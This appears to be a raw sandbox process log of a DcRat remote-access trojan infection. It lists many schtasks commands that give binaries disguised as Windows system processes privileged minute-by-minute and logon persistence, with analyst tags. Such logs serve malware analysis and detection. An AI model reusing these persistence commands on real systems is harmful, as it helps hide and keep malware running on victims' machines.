C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:3928
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:5436
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5860
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:3460
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5144
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:4004
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:392
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:744
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:4956
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:4828
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6820
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:6904
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1536
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:5356
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6040
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:6440
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:624
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6216
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6220
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6576
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1608
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:5488
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5252
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1240
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2508
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:5360
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:4776
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:4892
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6936
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:6368
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:3544
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:6692
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5336
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1208
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6756
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:6636
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1456
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:4828
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6500
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2868
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5160
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:3720
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5816
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:4392
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:3968
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:4976
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6372
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:5848
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6624
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:7012
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2128
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:3964
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1932
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:3876
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5656
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:7104
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6752
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:964
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:3608
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:944
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:4768
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:7148
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1228
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:2348
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5204
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:3824
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:4700
-
-
-
C:\Windows\system32\msiexec.exe (depth 1, PID 2424)
  C:\Windows\system32\msiexec.exe /V
  - Blocklisted process makes network request
  - Enumerates connected drives
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

C:\Windows\System32\MsiExec.exe (depth 2, PID 3592)
  C:\Windows\System32\MsiExec.exe -Embedding D65C21151CFAD8EA15E1C659DA8D6DC6
  - Loads dropped DLL

C:\Windows\syswow64\MsiExec.exe (depth 2, PID 4396)
  C:\Windows\syswow64\MsiExec.exe -Embedding 5BA32F3C6927AC0EC167C8219E706692
  - Loads dropped DLL
C:\Windows\system32\schtasks.exe (depth 1, PID 3116)
  schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /f
  - DcRat
  - Process spawned unexpected child process

C:\Windows\system32\schtasks.exe (depth 1, PID 3444)
  schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f
  - DcRat
  - Process spawned unexpected child process

C:\Windows\system32\schtasks.exe (depth 1, PID 3208)
  schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process

C:\Windows\system32\schtasks.exe (depth 1, PID 5092)
  schtasks.exe /create /tn "faildsfsdff" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\faildsfsdf.exe'" /f
  - DcRat
  - Process spawned unexpected child process

C:\Windows\system32\schtasks.exe (depth 1, PID 4832)
  schtasks.exe /create /tn "faildsfsdf" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\faildsfsdf.exe'" /rl HIGHEST /f
  - DcRat
  - Process spawned unexpected child process

C:\Windows\system32\schtasks.exe (depth 1, PID 4188)
  schtasks.exe /create /tn "faildsfsdff" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\faildsfsdf.exe'" /rl HIGHEST /f
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 4788)
  schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 9 /tr "'C:\DriversavessessionDlldhcp\Refcrt.exe'" /f
  - DcRat
  - Process spawned unexpected child process

C:\Windows\system32\schtasks.exe (depth 1, PID 3776)
  schtasks.exe /create /tn "Refcrt" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Refcrt.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 4420)
  schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 11 /tr "'C:\DriversavessessionDlldhcp\Refcrt.exe'" /rl HIGHEST /f
  - DcRat
  - Process spawned unexpected child process

C:\Windows\system32\schtasks.exe (depth 1, PID 544)
  schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Windows\Vss\Writers\Application\WmiPrvSE.exe'" /f
  - Process spawned unexpected child process

C:\Windows\system32\schtasks.exe (depth 1, PID 3040)
  schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Vss\Writers\Application\WmiPrvSE.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 2756)
  schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Windows\Vss\Writers\Application\WmiPrvSE.exe'" /rl HIGHEST /f
  - DcRat
  - Process spawned unexpected child process

C:\Windows\system32\schtasks.exe (depth 1, PID 4160)
  schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\SKB\LanguageModels\RuntimeBroker.exe'" /f
  - Process spawned unexpected child process

C:\Windows\system32\schtasks.exe (depth 1, PID 3864)
  schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\SKB\LanguageModels\RuntimeBroker.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 4940)
  schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Windows\SKB\LanguageModels\RuntimeBroker.exe'" /rl HIGHEST /f
  - DcRat
  - Process spawned unexpected child process

C:\Windows\system32\schtasks.exe (depth 1, PID 2556)
  schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Program Files\WindowsPowerShell\dllhost.exe'" /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 3204)
  schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\WindowsPowerShell\dllhost.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 2012)
  schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files\WindowsPowerShell\dllhost.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 60)
  schtasks.exe /create /tn "SolaraBootstrapperS" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\SolaraBootstrapper.exe'" /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 1520)
  schtasks.exe /create /tn "SolaraBootstrapper" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\SolaraBootstrapper.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process

C:\Windows\system32\schtasks.exe (depth 1, PID 1032)
  schtasks.exe /create /tn "SolaraBootstrapperS" /sc MINUTE /mo 7 /tr "'C:\Program Files\Uninstall Information\SolaraBootstrapper.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 3168)
  schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Windows\Cursors\smss.exe'" /f
  - DcRat
  - Process spawned unexpected child process

C:\Windows\system32\schtasks.exe (depth 1, PID 1688)
  schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\Cursors\smss.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 2836)
  schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Windows\Cursors\smss.exe'" /rl HIGHEST /f
  - DcRat
  - Process spawned unexpected child process

C:\Windows\system32\schtasks.exe (depth 1, PID 3252)
  schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Pictures\Registry.exe'" /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 4240)
  schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Users\Default\Pictures\Registry.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 1272)
  schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Pictures\Registry.exe'" /rl HIGHEST /f
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 2156)
  schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /f
  - Process spawned unexpected child process

C:\Windows\system32\schtasks.exe (depth 1, PID 1552)
  schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 1408)
  schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 3400)
  schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Windows\fr-FR\conhost.exe'" /f
  - Process spawned unexpected child process

C:\Windows\system32\schtasks.exe (depth 1, PID 1728)
  schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\fr-FR\conhost.exe'" /rl HIGHEST /f
  - DcRat
  - Process spawned unexpected child process

C:\Windows\system32\schtasks.exe (depth 1, PID 324)
  schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Windows\fr-FR\conhost.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 1916)
  schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe'" /f
  - DcRat
  - Process spawned unexpected child process

C:\Windows\system32\schtasks.exe (depth 1, PID 3720)
  schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process

C:\Windows\system32\schtasks.exe (depth 1, PID 4704)
  schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process

C:\Windows\system32\schtasks.exe (depth 1, PID 2420)
  schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\DriversavessessionDlldhcp\cmd.exe'" /f
  - DcRat
  - Process spawned unexpected child process

C:\Windows\system32\schtasks.exe (depth 1, PID 4060)
  schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\cmd.exe'" /rl HIGHEST /f
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 3116)
  schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\DriversavessessionDlldhcp\cmd.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 552)
  schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /f
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task

C:\Windows\system32\schtasks.exe (depth 1, PID 2492)
